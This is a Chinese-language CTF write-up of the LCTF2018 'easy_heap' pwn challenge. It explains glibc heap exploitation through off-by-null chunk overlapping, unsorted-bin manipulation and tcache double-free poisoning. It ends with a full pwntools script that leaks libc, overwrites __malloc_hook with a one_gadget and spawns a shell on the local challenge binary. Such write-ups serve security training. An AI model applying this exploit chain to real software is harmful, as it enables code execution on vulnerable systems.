LCTF2018 PWN easy_heap

颇有收获的一道题

Key

• 对 unsorted bin 切分机制的利用，当 unsorted bin 中仅有一个 chunk 时，若申请大小 < 该 chunk，会直接从该 chunk 头部开始切对应大小的内存分出来，剩下一部分继续留在 unsorted bin 中。

• 利用堆上的 off-by-null 实现向低地址处的 chunk overlapping。

• 在无法写入所需 prev_size 的情况下，利用相邻空闲块的合并，来构造合适的堆风水方式，让系统帮助我们写入对应的 prev_size。

• 低版本下 tcache 完全不检查 double free，通过 double free 来实现 tcache poisoning。

利用思路的核心和重点是 leak libc_base。所有保护都开了，这里考虑用 unsorted bin 来 leak。程序的字符串输入函数存在 off-by-null，堆上的 off-by-null 一般考虑通过覆盖 prev_size 和 prev_inuse位 实现 overlapping。

这个程序的输入函数不能够输入 \x00，我们没有办法写入我们所需要的 prev_size。然而在 chunk 的申请与释放中，会对后面的 chunk 的 prev_size 进行修改，于是我们考虑利用系统帮我们写入 prev_size。

我们所需要的 prev_size=0x200，比原先的要大，因此尝试借助unsorted bin 的合并机制，来对目标 chunk 的 prev_size 进行修改。因此至少需要 3 个 chunk 不放入 tcache 中。程序限制至多拿 10 个 chunk，填满 tcache 正好剩下 3 个。

可以通过将 target 的前两个 chunk 合并，来让 prev_size = 0x200。不过仅仅这样是不够的，因为就这样进行 extend，没有一个指针会指向合并后的大块中的任何地址，是无效的。因此需要把中间的 chunk 拿出来后，再进行向上的 extend。直接拿出来仍然会修改 target 的 prev_size，因为对合并后的大块进行切分，会修改 next_chunk 的 prev_size。既然如此，我们不妨把 target 一并并入这个大块，然后进行切分，这样修改的就不是它的 prev_size 了。再次将 target 拿出来时，target 的 prev_size 会保留为 0x200。

全部重新拿下来后，先 free 掉第一个 chunk，再去用 off-by-null 去覆盖 prev_inuse，这样防止在 free 第一个时，让原本 allocated 的第二个 chunk 进行 unlink 导致报错。

覆盖那一步，需要让第二个 chunk 放入 tcache 再取出，这样才能够不破坏原本构造的 prev_size。

最后再把 tcache 填满，然后对第三个 chunk 进行 free 就可以实现 overlapping 了。

为了防止与 Top chunk 合并需要在第三个 chunk 后面放一个 chunk。

后续的利用就十分简单了。

exp

from pwn import *
io = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
def add(size,content):io.sendafter(b'which command?\n> ',b'1')io.sendafter(b'size \n> ',str(size).encode())io.sendlineafter(b'content \n> ',content)
def free(idx):io.sendafter(b'which command?\n> ',b'2')io.sendafter(b'index \n> ',str(idx).encode())
def dump(idx):io.sendafter(b'which command?\n> ',b'3')io.sendafter(b'index \n> ',str(idx).encode())
def get_libc():for i in range(10):add(1,b'a')for i in range(6):free(i)free(9)for i in range(6,9):free(i)for i in range(7):add(1,b'a')add(1,b'a') # id 7add(1,b'a') # id 8add(1,b'a') # id 9for i in range(6):free(i)free(8)free(7)payload = b'a'*0xf0add(0xf8,payload) # id 0free(6)free(9)for i in range(7):add(1,b'a') # 1~7add(1,b'a') # 8dump(0)offset = 0x7f57be9ebca0-0x7f57be600000res = io.recv(6)+b'\x00'*2res = u64(res)-offsetadd(1,b'a') # 9for i in range(1,4):free(i)return resdef Exploit():libc_base = get_libc()malloc_hook = libc_base+libc.symbols['__malloc_hook']one_gadget = libc_base+0x10a38cprint(hex(malloc_hook))print(hex(one_gadget))free(0)free(9)payload = p64(malloc_hook)add(8,payload) # 0add(1,b'a')payload = p64(one_gadget)add(8,payload) # 2"""gdb.attach(io,'''b malloc''')pause()"""io.sendafter(b'which command?\n> ',b'1')io.interactive()
if __name__ == '__main__':Exploit()